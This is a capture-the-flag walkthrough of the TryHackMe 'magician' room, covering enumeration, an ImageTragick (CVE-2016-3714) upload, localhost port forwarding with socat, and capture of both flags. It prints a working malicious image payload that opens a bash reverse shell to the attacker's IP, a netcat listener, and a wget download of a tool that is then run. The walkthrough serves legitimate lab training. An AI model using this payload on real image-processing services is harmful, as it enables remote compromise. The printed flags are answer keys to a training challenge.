TryHackMe-magician
This magical website lets you convert image file formats.
Note: this machine needs about 7 minutes to start up, please be patient :)
Please add the IP address of this machine with the hostname “magician” to your /etc/hosts file on Linux before you start. On Windows, the hosts file should be at C:32.
Use the hostname instead of the IP address if you want to upload a file. This is required for the room to work correctly ;)
Have fun and use your magic skills!
user.txt
Initial foothold
Let’s first add the hostname to our hosts file, as told above:
echo "10.10.100.95 magician" | sudo tee -a /etc/hosts
Nmap discovers 3 open ports:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later 8080/tcp open http-proxy | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 | Vary: Origin | Vary: Access-Control-Request-Method | Vary: Access-Control-Request-Headers | Content-Type: application/json | Date: Fri, 30 Apr 2021 09:52:06 GMT | Connection: close | {"timestamp":"2021-04-30T09:52:07.398+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"} | GetRequest: | HTTP/1.1 404 | Vary: Origin | Vary: Access-Control-Request-Method | Vary: Access-Control-Request-Headers | Content-Type: application/json | Date: Fri, 30 Apr 2021 09:52:06 GMT | Connection: close | {"timestamp":"2021-04-30T09:52:06.969+0000","status":404,"error":"Not Found","message":"No message available","path":"/"} | HTTPOptions: | HTTP/1.1 404 | Vary: Origin | Vary: Access-Control-Request-Method | Vary: Access-Control-Request-Headers | Content-Type: application/json | Date: Fri, 30 Apr 2021 09:52:06 GMT | Connection: close | {"timestamp":"2021-04-30T09:52:07.099+0000","status":404,"error":"Not Found","message":"No message available","path":"/"} | RTSPRequest: | HTTP/1.1 505 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 465 | Date: Fri, 30 Apr 2021 09:52:06 GMT | <!doctype html><html lang="en"><head><title>HTTP Status 505 | HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 |_ HTTP Version Not Supported</h1></body></html> |_http-title: Site doesn't have a title (application/json). 8081/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: magician
FTP
Attempting to connect to the FTP service as anonymous will succeed and provide us with a hint. However, there is nothing else to expect.
kali@kali:/data/vpn$ ftp magician Connected to magician. 220 THE MAGIC DOOR Name (magician:kali): anonymous 331 Please specify the password. Password: 230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though... 230 Login successful. ftp> ls -la 550 Permission denied. ftp: bind: Address already in use ftp> cd / 550 Permission denied. ftp>
Web (8080)
Browsing http://magician:8080 will show a page that converts a PNG file to a JPG file.
As the hint given by the FTP was referring to a vulnerability (https://imagetragick.com, CVE-2016–3714), we can guess that we have to exploit this vulnerability by uploading a malicious PNG file.
After several failed attempts, I eventually found a working exploit here. Below is the code to make the malicious PNG file:
kali@kali:/data/magician/files$ cat > image.png << EOF > push graphic-context > encoding "UTF-8" > viewbox 0 0 1 1 > affine 1 0 0 1 0 0 > push graphic-context > image Over 0,0 1,1 '|/bin/bash -i > /dev/tcp/10.8.50.72/4444 0<&1 2>&1' > pop graphic-context > pop graphic-context > EOF
open a listener and upload the image using the web form. A reverse shell spawns in our listener window:
kali@kali:/data/magician/files$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.100.95] 60864 bash: cannot set terminal process group (957): Inappropriate ioctl for device bash: no job control in this shell magician@magician:/tmp/hsperfdata_magician$ id id uid=1000(magician) gid=1000(magician) groups=1000(magician)
User flag
Let’s get the user flag:
magician@magician:/tmp/hsperfdata_magician$ cd /home cd /home magician@magician:/home$ ll ll total 12 drwxr-xr-x 3 root root 4096 Jan 30 10:43 ./ drwxr-xr-x 24 root root 4096 Jan 30 10:31 ../ drwxr-xr-x 5 magician magician 4096 Feb 13 07:19 magician/ magician@magician:/home$ cd magician cd magician magician@magician:~$ ls -la ls -la total 17204 drwxr-xr-x 5 magician magician 4096 Feb 13 07:19 . drwxr-xr-x 3 root root 4096 Jan 30 10:43 .. lrwxrwxrwx 1 magician magician 9 Feb 6 13:38 .bash_history -> /dev/null -rw-r--r-- 1 magician magician 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 magician magician 3771 Apr 4 2018 .bashrc drwx------ 2 magician magician 4096 Jan 30 10:43 .cache drwx------ 3 magician magician 4096 Jan 30 10:43 .gnupg -rw-r--r-- 1 magician magician 807 Apr 4 2018 .profile -rw-r--r-- 1 magician magician 0 Jan 30 10:43 .sudo_as_admin_successful -rw------- 1 magician magician 7546 Jan 31 03:50 .viminfo -rw-r--r-- 1 root root 17565546 Jan 30 11:55 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar -rw-r--r-- 1 magician magician 170 Feb 13 07:19 the_magic_continues drwxr-xr-x 2 root root 4096 Feb 5 05:14 uploads -rw-r--r-- 1 magician magician 24 Jan 30 11:30 user.txt magician@magician:~$ cat user.txt cat user.txt THM{simsalabim_hex_hex}
root.txt
Hint
Still connected as magician
, there is a hint in the /home/magician/
directory:
magician@magician:~$ cat the_magic_continues cat the_magic_continues The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.
Following the hint, I checked the network connections with netstat
, which revealed a weird connection on port 6666
. This is however only available for localhost
.
magician@magician:/tmp/hsperfdata_magician/uploads$ netstat -putan netstat -putan (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:6666 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 300 10.10.100.95:60902 10.8.50.72:4444 ESTABLISHED 27129/bash tcp6 0 0 :::8080 :::* LISTEN 957/java tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 10.10.100.95:8080 10.8.50.72:35182 ESTABLISHED 957/java udp 0 0 127.0.0.53:53 0.0.0.0:* - udp 0 0 10.10.100.95:68 0.0.0.0:* -
The program on port 6666
Let’s use socat
to forward the local port and make the program available to the outside.
Transfer the socat
binary from your Kali box to the server and use it to forward local port 6666
to port 7777
:
magician@magician:~$ wget http://10.8.50.72:8000/socat magician@magician:~$ chmod +x socat magician@magician:~$ ./socat tcp-listen:7777,reuseaddr,fork tcp:localhost:6666
Now, connecting in a browser to port 7777
(http://magician:7777/) shows a new page that allows to read files. The program is likely run by root
as it allows to read the root flag:
Press Submit until you get a base64 encoded string (the program is rotating through a bunch of encodings, including hex, binary, md5, base64).
Once we have our root flag as base64 encoded string, let’s decode it:
kali@kali:/data/src$ echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d THM{magic_may_make_many_men_mad}
Root flag: THM{magic_may_make_many_men_mad}